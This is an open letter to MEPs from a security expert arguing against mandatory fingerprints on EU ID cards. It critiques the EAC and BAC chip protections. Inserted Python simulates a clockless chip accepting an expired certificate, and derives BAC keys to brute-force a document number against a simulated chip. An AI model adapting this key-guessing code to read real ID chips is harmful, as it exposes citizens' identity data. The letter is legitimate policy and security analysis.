Regarding Procedure 2018/0104(COD) on the Security of identity cards of Union citizens and of residence documents issued to Union citizens and their family members

Dear MEPs,

I’m writing to you in my capacity as an expert on information security and data protection, as well as a former technical advisor to the Deputy Prime Minister and Minister of Interior of Bulgaria. Legislation and technical requirements for the Bulgarian ID cards were part of my work in 2015–2016, which is why I feel confident writing on the matter.

I’m writing this in the hope that it will be taken into account during the trialogue meetings. In general, I support the position adopted in the mandate of the European Parliament against mandatory fingerprints on ID cards and hereby provide arguments for it.

I’d like to begin with a statement of general support for the proposed Regulation — I’m all for harmonisation and standardisation of ID cards as well as improving their security. Paper-based identity documents and those without security features (both physical and electronic) are not adequate for 21st-century realities and technological capabilities, and so I strongly support legislation toward improving the status quo.

That said, there is one particularly troubling aspect of the proposed Regulation that I’d like to focus on — the introduction of mandatory fingerprints on the ID card. It is problematic in many respects, but I will cover primarily the information security one.

The security of existing technologies has not been properly assessed by the Commission in the context of ID cards. The proposal relies entirely on the ICAO standard but fails to investigate its security and to take into account some key differences (although they are mentioned in the impact assessment): a citizen doesn’t carry their passport all the time and is not obliged by law to do so, which is not true for ID cards in some Member States. Carrying the document all the time increases the potential risks significantly.

The ICAO standard (ICAO Doc 9303) has had a multitude of security problems throughout the years. It has been updated several times because of that, but it still has some fundamental flaws.

Some of the issues with electronic passports and the ICAO standard are covered in the following research papers: https://www.sciencedirect.com/science/article/pii/S0957417414001201, https://eprint.iacr.org/2005/095.pdf , https://eprint.iacr.org/2010/103.pdf as well as this presentation by a security researcher https://www.defcon.org/images/defcon-15/dc15-presentations/dc-15-grunwald.pdf . Additional issues are outlined by the EFF in this position: https://www.eff.org/deeplinks/2012/10/highest-court-european-union-rule-biometrics-privacy

The fundamental problem is that fingerprint data has to be readable from the chip without any action by the owner of the document (no PIN, no button, nothing to open). This means that trusted authorities (e.g. border guards) must have a means to read the fingerprints and nobody else may have it. In the world of information security this is achievable on a small scale, but at the scale of the entire European Union, and in fact the entire world, it is destined to fail. The way the EAC standard protects fingerprint data in e-passports is a certificate chain: each country’s root authority (the CVCA) issues certificates to the document verifiers of every other country, and each document verifier in turn issues short-lived certificates to the terminals and border-guard devices that are allowed to read the fingerprint data. If the private key behind a single terminal certificate somewhere in the world leaks, anyone holding it is able to read the fingerprints of every citizen, because every chip trusts the same chain.

The countermeasures for that are:

the certificates are short-lived (e.g. 1 day), which introduces operational complexity, but that way a leak would have a short-lived effect;

in order to read the chip, an attacker has to be physically very close to the document;

an attacker may still need to provide a password derived from the machine-readable zone printed on the document.

Unfortunately, none of these measures are good enough:

Chips have no clock. They cannot know the current time, so the fact that a certificate is short-lived is of little use. They do advance their stored date after passing successful checks (from the dates of the certificates they verify), but in the Schengen area a border check of an ID card may practically never happen, so the stored date never moves.

A sufficiently large and powerful antenna can be used to read contactless chips from up to 2 meters.

A chip can’t prevent brute-force attacks, so guessing the password over a period of time is quite realistic. Furthermore, ID cards, unlike passports, don’t have a cover, so the data from which the password is derived can be read visually at any time (whereas on a passport it can only be read if the right page is open).

EACv2, the latest version of the standard, covers most of the issues raised in the research papers, but implementations are normally backward compatible, so the insecure old versions still have to be supported.
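To make the "no clock" point concrete, here is a small simulation added in editing; it is not part of the original letter and not reference code from ICAO or BSI. It models, in simplified form, the certificate-date rule of EAC Terminal Authentication as specified in BSI TR-03110: a chip judges certificate expiry against the latest date it has learned, and only its own country’s certificates move that date forward. Signatures are assumed to verify, and all certificate names, dates and the "leaked" one-day terminal certificate are constructed for the illustration.

```python
from dataclasses import dataclass
from datetime import date

# Simplified model of EAC Terminal Authentication on a clockless chip, after
# ICAO Doc 9303 / BSI TR-03110. Signature checks are assumed to pass; only the
# chain and date logic is modelled. Holder names and dates are constructed.


@dataclass(frozen=True)
class CVCert:
    holder: str        # e.g. "DECVCA1", "FRDV0001": first two letters = country
    issuer: str
    role: str          # "CVCA", "DV" or "IS"
    effective: date
    expiration: date


class ClocklessChip:
    """A chip has no wall-clock time; its 'current date' is the latest date it has learned."""

    def __init__(self, trust_anchor: CVCert, personalised_on: date):
        self.trust_anchor = trust_anchor
        self.current_date = personalised_on

    def verify_chain(self, chain: list[CVCert]) -> bool:
        """Walk DV -> IS. Returns True if the chip would grant fingerprint access."""
        issuer = self.trust_anchor
        for cert in chain:
            if cert.issuer != issuer.holder:
                return False
            # Expiry is judged against the chip's own notion of "today".
            if cert.expiration < self.current_date:
                return False
            # TR-03110 rule (simplified here): only CVCA link certificates and
            # domestic DV certificates advance the stored date; foreign ones never
            # do, so a card never checked by its own country stays in the past.
            domestic = cert.holder[:2] == self.trust_anchor.holder[:2]
            if cert.role == "CVCA" or (cert.role == "DV" and domestic):
                self.current_date = max(self.current_date, cert.effective)
            issuer = cert
        return True


def honest_terminal_accepts(chain: list[CVCert], today: date) -> bool:
    """What a verifier with a real clock would conclude about the same chain."""
    return all(c.effective <= today <= c.expiration for c in chain)


CVCA = CVCert("DECVCA1", "DECVCA1", "CVCA", date(2017, 1, 1), date(2020, 1, 1))
# A foreign DV certified by the chip's CVCA, and a one-day IS certificate under
# it whose private key is assumed (for this illustration) to have leaked.
LEAKED_CHAIN = [
    CVCert("FRDV0001", "DECVCA1", "DV", date(2018, 3, 1), date(2018, 6, 1)),
    CVCert("FRIS0042", "FRDV0001", "IS", date(2018, 3, 10), date(2018, 3, 11)),
]
# A domestic check performed much later, which is what would move the date.
DOMESTIC_CHAIN = [
    CVCert("DEDV0003", "DECVCA1", "DV", date(2019, 5, 1), date(2019, 8, 1)),
    CVCert("DEIS0007", "DEDV0003", "IS", date(2019, 5, 20), date(2019, 5, 21)),
]
TODAY = date(2019, 6, 1)


def scenario() -> tuple[bool, bool, bool]:
    """(honest verdict, verdict of a never-checked chip, verdict after one domestic check)."""
    honest = honest_terminal_accepts(LEAKED_CHAIN, TODAY)
    never_checked = ClocklessChip(CVCA, date(2018, 1, 1))
    accepted_stale = never_checked.verify_chain(LEAKED_CHAIN)
    checked_at_home = ClocklessChip(CVCA, date(2018, 1, 1))
    checked_at_home.verify_chain(DOMESTIC_CHAIN)   # stored date becomes 2019-05-01
    accepted_after = checked_at_home.verify_chain(LEAKED_CHAIN)
    return honest, accepted_stale, accepted_after


if __name__ == "__main__":
    print(scenario())
```

Fifteen months after the terminal certificate expired, a chip that has never been checked by its own country still accepts it, while the same chip rejects it after a single domestic check. A card that is carried daily but only ever shown to police or banks, never to a border terminal of its issuing state, is in the first situation indefinitely.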

Overall, the security is questionable, and making fingerprint storage on ID cards mandatory without a proper assessment is a big risk, especially given that fingerprints are becoming a mainstream way of unlocking important possessions — mobile phones, homes, cars. And this is just the economic side of things; the risks to civil liberties, given the questionable security, are a whole other topic.

Such issues might be considered an acceptable price if the fingerprint requirement solved real, serious problems. Unfortunately, that is not the case — fingerprints don’t help much in detecting fraudulent use of ID cards. Let’s briefly review three use cases:

Fake / forged documents — fingerprints add nothing to detecting a document that a malicious actor has fabricated. In order to establish that a document has been issued by the proper authority, a digital signature by the issuer over the non-biometric data suffices.

An issuing country gets its security compromised and malicious actors get fake documents issued — fingerprints don’t help here either, as the malicious actor can issue a perfectly valid document with the correct fingerprints under a fake identity. It became apparent, for example, that the Russian GRU does that for its undercover agents, as reported in an investigation by Bellingcat.

The wrong person using a genuine document — this is reported by the Commission to be an issue that is helped by biometric data. There are three aspects to this:

Face recognition is usually sufficient. If the person uses the card at a border, automated face recognition can be used (and is currently used at e-gates) in addition to the human inspection.

Lost and stolen cards are often reported as missing, and proper sharing of information on lost and stolen cards across Member States will be a significant improvement.

If the citizen has already entered the Schengen area (as in the case of Ukrainian citizens entering Poland, reported by the Commission), then no additional border checks will be required, and other public-sector authorities won’t be allowed to read the fingerprints anyway.

The impact assessment provided by the Commission (http://ec.europa.eu/transparency/regdoc/rep/10102/2018/EN/SWD-2018-110-F1-EN-MAIN-PART-1.PDF) does have some important findings that don’t seem to be taken into account in the final proposal:

“Following five year investigation into the operational needs for a biometric identifier which balances effectiveness to achieve this identification purpose with practicality privacy laws, ICAO specified that facial recognition become the globally interoperable biometric technology, accessed contactlessly, with fingerprints or iris recognitions as options in support”

It is worth noting that the impact assessment by the Commission wrongly states that Bulgaria is to introduce contactless ID cards with biometrics. Precisely because of the reasons stated above, the Bulgarian legislation makes biometrics optional on the ID card and biometrics will be stored on the card only if a citizen explicitly wishes so (i.e. opt-in).

An opinion by the regulatory scrutiny board ( http://ec.europa.eu/transparency/regdoc/rep/2/2018/EN/SEC-2018-195-1-EN-MAIN-PART-1.PDF) has the same criticism towards the lack of security assessment:

“In view of the sensitive nature of the (biometric) information that would be stored on the ID and residence documents, the report needs to be more specific on how data protection would be ensured. It should describe the measures and techniques used to restrict access to personal data”

The final impact assessment states that Section 8.2. has been updated accordingly, but it only contains vague recommendations. It lacks any substantial analysis on the security of the proposal — e.g. it mentions EAC (extended access control) but fails to mention that only version 2 of the protocol should be admissible. BAC (basic access control) is also generally not recommended but it is mentioned in the recommendations, while the PACE protocol, which is a more recent improvement, is not specified. It is worth noting, however, that some implementations of the PACE protocol rely on patented algorithms which might mean Member States having to pay royalties per card and per card reader.
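To show concretely why BAC offers so little protection when the machine-readable zone of a card is visible (the brute-force point made earlier and the BAC remark here), the following Python was added in editing; it is not part of the original letter and not a reference implementation from ICAO. It derives the BAC keys exactly as ICAO Doc 9303 Part 11 prescribes (SHA-1 of the document number, date of birth and expiry date with their check digits, then two parity-adjusted 3DES keys) and then guesses the last three digits of a constructed document number against a simulated chip that, like a real one, keeps no failure counter. The sample card data, the class and function names and the assumption that a matching K_enc stands in for a successful mutual authentication are all assumptions for the illustration.

```python
import hashlib
import itertools
import string

# BAC key derivation as specified in ICAO Doc 9303 Part 11: the access keys are
# nothing more than a SHA-1 of three MRZ fields and their check digits.

WEIGHTS = (7, 3, 1)


def mrz_char_value(ch: str) -> int:
    """MRZ character value: digits as themselves, A..Z = 10..35, filler '<' = 0."""
    if ch.isdigit():
        return int(ch)
    if ch == "<":
        return 0
    if "A" <= ch <= "Z":
        return ord(ch) - ord("A") + 10
    raise ValueError(f"invalid MRZ character {ch!r}")


def mrz_check_digit(field: str) -> int:
    """ICAO 7-3-1 weighted check digit, modulo 10."""
    return sum(mrz_char_value(c) * WEIGHTS[i % 3] for i, c in enumerate(field)) % 10


def mrz_information(doc_no: str, dob: str, expiry: str) -> str:
    """Document number, birth date (YYMMDD) and expiry date (YYMMDD), each with its check digit."""
    return "".join(f"{f}{mrz_check_digit(f)}" for f in (doc_no, dob, expiry))


def odd_parity(key: bytes) -> bytes:
    """Set the DES parity bit of every byte so that each byte has odd parity."""
    return bytes((b & 0xFE) | (1 if bin(b & 0xFE).count("1") % 2 == 0 else 0) for b in key)


def derive_bac_keys(mrz_info: str) -> tuple[bytes, bytes, bytes]:
    """Returns (K_seed, K_enc, K_mac); K_enc and K_mac are two-key 3DES keys."""
    k_seed = hashlib.sha1(mrz_info.encode("ascii")).digest()[:16]
    k_enc = odd_parity(hashlib.sha1(k_seed + (1).to_bytes(4, "big")).digest()[:16])
    k_mac = odd_parity(hashlib.sha1(k_seed + (2).to_bytes(4, "big")).digest()[:16])
    return k_seed, k_enc, k_mac


class SimulatedChip:
    """Stand-in for a BAC chip (assumption for this illustration): a session
    'succeeds' when the reader holds the same K_enc. Like a real chip it keeps
    no failure counter and never locks out."""

    def __init__(self, doc_no: str, dob: str, expiry: str):
        self._k_enc = derive_bac_keys(mrz_information(doc_no, dob, expiry))[1]
        self.attempts = 0

    def try_session(self, k_enc: bytes) -> bool:
        self.attempts += 1
        return k_enc == self._k_enc


def guess_document_number(chip: SimulatedChip, known_prefix: str, unknown_digits: int,
                          dob: str, expiry: str):
    """Brute-force the trailing digits of the document number; birth and expiry dates are
    assumed read off the card face. Returns (recovered number, attempts) or (None, attempts)."""
    for tail in itertools.product(string.digits, repeat=unknown_digits):
        candidate = known_prefix + "".join(tail)
        _, k_enc, _ = derive_bac_keys(mrz_information(candidate, dob, expiry))
        if chip.try_session(k_enc):
            return candidate, chip.attempts
    return None, chip.attempts


# Constructed sample card for the demo (not a real document number).
SAMPLE_DOC_NO, SAMPLE_DOB, SAMPLE_EXPIRY = "AB1234567", "850315", "281103"


def demo() -> tuple:
    """Attacker knows the dates and the first six characters; guesses the last three digits."""
    chip = SimulatedChip(SAMPLE_DOC_NO, SAMPLE_DOB, SAMPLE_EXPIRY)
    return guess_document_number(chip, "AB1234", 3, SAMPLE_DOB, SAMPLE_EXPIRY)


if __name__ == "__main__":
    print(mrz_information("L898902C<", "690806", "940623"))   # MRZ information from the Doc 9303 worked example
    print(demo())
```

With the dates printed on the face of the card and a document number of known format, the only secret left is whatever part of the number the attacker has not yet seen: ten candidates per unknown digit, tried at whatever rate the chip answers, with nothing on the chip to slow the attacker down. If the whole MRZ is visible, as it is on a cover-less ID card, there is nothing to guess at all.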

The impact assessment also states that:

“Under options ID 2) and ID 3) citizens will be required to provide their fingerprints when ID cards are requested. This obligation interferes with the fundamental rights to privacy and data protection. While in the Schwarz case the CJEU held that the interference with regard to passports is proportionate to the objective of maintaining security, in the context of ID cards the threshold for satisfying the necessity test may be higher, because ID cards are compulsory in some Member States in which fingerprints are not currently collected.“

Yet, no additional security measures are envisioned or implied, apart from the ICAO Doc 9303 standard.

With all of the above arguments taken into account, I’d like to advise on not adopting the mandatory storage of fingerprints in ID cards. If such a measure is to be taken, it has to be more thoroughly assessed from a technical and information security perspective as well as regarding its effectiveness in solving the problems at hand. It is currently not demonstrated and not clear whether fingerprints stored in ID cards will be secure enough to protect the rights of citizens and whether they are required to solve the problems of identity document fraud.

Best regards,

Bozhidar Bozhanov